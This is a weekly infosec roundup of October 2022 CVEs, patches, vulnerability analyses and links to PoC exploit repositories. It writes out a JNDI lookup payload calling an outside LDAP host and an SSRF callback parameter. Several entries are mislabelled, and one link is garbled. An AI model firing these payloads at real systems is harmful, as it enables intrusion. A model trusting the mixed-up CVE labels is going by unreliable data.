\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 25th October-01st November 2022.\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Morzilla, Microsoft, NodeJS, Github, Cisco, Linux(Ubuntu 22.4,20.4& 18.4 LTE) etc.\n \n CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n CVE-2022-3236 & CVE-2022-36966. \n\n \n CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits, \n CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).\n \n
\n\n🔧Security patched within a week:🔧\n \n > AdvisoryWeek track the latest Security Advisories of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in past Week and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n > [2022-43 - Apple, Canonical, Red Hat, nodejs, Cisco, Microsoft, GitHub.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9914437/Gmail.-.2022-43.-.Apple.Canonical.Red.Hat.nodejs.Cisco.Microsoft.GitHub.pdf)\n\n
\n\n
\n\n📝CVE analysis, writeups & reports: (6 cve analysis in this Week)📝\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-40684 technical-deep-dive-cve-2022-40684/)\n \n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner) : New*\n - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n - Vendor : **Fortinet FortiGate**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n \n - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352 ](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/) \n \n - Target/Product: **Zimbra**\n - Discription/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n - [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n - Payload : [jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");]\n - Target : **Apache Commons Jxpath**\n - Discription : This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n - [Analysis:Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n - [Tool : CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)\n - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Solution : Upgrade to Apache Commons Text 1.10.0.\n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) \n \n - Target/Product: **Microsoft** \n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n - Target/Product: **SOPHOS**\n - Discription/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n - Target/Product: **SolarWinds Platform 2022.3.**\n - Affected Cersion : Solarwind <= v2022.3 and Orion Platform <= 2020.2.6 HF5 .\n - Discription/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n
\n\n
\n 🚑Poc for cve & exploit (Total : 12 new 0-day in last week)🚑:\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n \n - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n - Affected Version: Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n - Discription : We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n - [Poc CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n \n - Target/Product: **Gluu**\n - Affected Version: < v4.4.1 \n - Title : Internal network scanner through Gluu IAM blind ssrf. \n - Discription : Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n \n - Target/Product: **Microsoft Edge**\n - Affected Version: < 97.0.1072.62\n - Discription : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.\n \n \n - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n \n - Target/Product: **MS Exchange**\n - Discription : The metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges. \n \n - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n \n - Target/Product: **Spring Cloud Gateway**\n - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n - Discription : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n \n - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n \n - Target/Product: **7-Zip**\n - Affected Version: Tested on Version 19.00\n - Discription : 7-ZipPostExploit is a Post-Exploitation script to exfiltrate 7-zip files(Tested on Version 19.00, the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-zip to an external attacker server. This is done in the post exploitation phase\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n \n - Target/Product: **Microsoft Exchage Server** \n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n\n - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n \n - Target/Product: **Avira**\n - Affected version ; \"Avira Security\" – for Windows version < 1.1.71.30554\n - Discription/Issue/Flaw : PoC for arbitrary file move vulnerability in Software Update component of Avira Security. Users have option to use this feature to update any outdated software on their PC ,when this feature is used Avira Security service will drop downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. First file that is created in subdirectory is in format _ then later this file is moved to just (leading numbers and underscore are removed).This directory have DACL's that dont allow unprivileged users to modify/delete newly created files but it will allow user to create junction. This can abused by creating junction point to user controlled directory which have more permissive DACL's , this way when new files are created in subdirectories user will be able to modify them and leverage it to obtain arbitrary file move which leads to LPE by writing dll in system32 directory that is later loaded by privileged service. Current PoC will load dll in windows update service, dll dont implement any kind of mutex to check if exploit was already executed which result in creating multiple cmd.exe process as dll is loaded multiple times.\n \n \n - [CVE-2022-27502](https://github.com/Mr-xn/cve-2022-23131)\n \n - Target/Product: **Zabbix**\n - Discription : Zabbix Unsafe Session Storage.\n \n - [Sploits](https://github.com/3sjay/sploits)\n \n - Target/Product: **aukey**\n - Discription : aukey-wr-01-RCE-0day.\n \n \n - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n \n - Target/Product: **RealVNC server**\n - Affected Version: aukey wr-r01 ROUTER 0day \n - Discription : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n
\n \n---\nHave a good Weekend#13\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Morzilla, Microsoft, Jenkins, Github, Cisco, Linux(Ubuntu 22.4,20.4& 18.4 LTE) etc.\n \n CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n CVE-2022-3236 & CVE-2022-36966. \n\n \n CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits, \n CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).\n \n
\n\n🔧Security patched within a week:🔧\n \n > We track the latest Security Advisories of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last Week and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n \n - **Morzilla security Advisories** : \n - Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.\n \n - **Jenkins security Advisories** : \n - This Week Jenkins announces [vulnerabilities in the multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice will be to follow the advise and update Affected plugins.\n \n - **[Cisco security Advisories](https://tools.cisco.com/security/center/publicationListing.x)** : \n - Cisco has released security update for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n \n - **Github security Advisories** : \n - [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)\n - [run-terraform allows for RCE via terraform plan ](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)\n - [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)\n \n - Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.\n - **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language,libksba - X.509 and CMS support library,git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library,\n\n - **Ubuntu 20.04 LTS** : libreoffice,libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.\n\n - **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.\n\n - **Microsoft** \n - Microsoft have released security advisory to provide information about a vulnerability exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n - https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v\n - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9\n - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff\n - https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv\n - https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9\n \n - **CISA Advisories**\n > CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.\n \n • ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)\n • ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)\n • ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)\n\n
\n\n
\n\n📝CVE analysis, writeups & reports: (6 cve analysis in this Week)📝\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-40684](https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/)\n \n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n - Vendor : **Fortinet FortiGate**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n \n - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352 ](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/) \n \n - Target/Product: **Zimbra**\n - Discription/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n - [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n - Payload : [jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");]\n - Target : **Apache Commons Jxpath**\n - Discription : This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n - [Analysis:Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n - [Tool : CVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files](https://github.com/jfrog/text4shell-tools)\n - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Solution : Upgrade to Apache Commons Text 1.10.0.\n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) \n \n - Target/Product: **Microsoft** \n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n - Target/Product: **SOPHOS**\n - Discription/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n - Target/Product: **SolarWinds Platform 2022.3.**\n - Affected Cersion : Solarwind <= v2022.3 and Orion Platform <= 2020.2.6 HF5 .\n - Discription/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n
\n\n
\n 🚑Poc for cve & exploit (Total : 12 new 0-day in last week)🚑:\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n \n - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n - Affected Version: Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n - Discription : We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n - [Poc CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n \n - Target/Product: **Gluu**\n - Affected Version: < v4.4.1 \n - Title : Internal network scanner through Gluu IAM blind ssrf. \n - Discription : Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n \n - Target/Product: **Microsoft Edge**\n - Affected Version: < 97.0.1072.62\n - Discription : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.\n \n \n - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n \n - Target/Product: **MS Exchange**\n - Discription : The metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges. \n \n - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n \n - Target/Product: **Spring Cloud Gateway**\n - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n - Discription : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n \n - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n \n - Target/Product: **7-Zip**\n - Affected Version: Tested on Version 19.00\n - Discription : 7-ZipPostExploit is a Post-Exploitation script to exfiltrate 7-zip files(Tested on Version 19.00, the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-zip to an external attacker server. This is done in the post exploitation phase\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n \n - Target/Product: **Microsoft Exchage Server** \n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n\n - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n \n - Target/Product: **Avira**\n - Affected version ; \"Avira Security\" – for Windows version < 1.1.71.30554\n - Discription/Issue/Flaw : PoC for arbitrary file move vulnerability in Software Update component of Avira Security. Users have option to use this feature to update any outdated software on their PC ,when this feature is used Avira Security service will drop downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. First file that is created in subdirectory is in format _ then later this file is moved to just (leading numbers and underscore are removed).This directory have DACL's that dont allow unprivileged users to modify/delete newly created files but it will allow user to create junction. This can abused by creating junction point to user controlled directory which have more permissive DACL's , this way when new files are created in subdirectories user will be able to modify them and leverage it to obtain arbitrary file move which leads to LPE by writing dll in system32 directory that is later loaded by privileged service. Current PoC will load dll in windows update service, dll dont implement any kind of mutex to check if exploit was already executed which result in creating multiple cmd.exe process as dll is loaded multiple times.\n \n \n - [CVE-2022-27502](https://github.com/Mr-xn/cve-2022-23131)\n \n - Target/Product: **Zabbix**\n - Discription : Zabbix Unsafe Session Storage.\n \n - [Sploits](https://github.com/3sjay/sploits)\n \n - Target/Product: **aukey**\n - Discription : aukey-wr-01-RCE-0day.\n \n \n - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n \n - Target/Product: **RealVNC server**\n - Affected Version: aukey wr-r01 ROUTER 0day \n - Discription : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n
\n \n---\nHave a good Weekend#12\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Apple, Microsoft, Adove, Github, google, Linux(Ubuntu, kali etc), etc.\n \n CVE:ANALYSIS & POC: Poc for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell \n and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): CVE-2021-46422(google crome), CVE-2022-41852, CVE-2021-45067, Poc for CVE-2022-40684 & Nuclei template, \n CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n \n
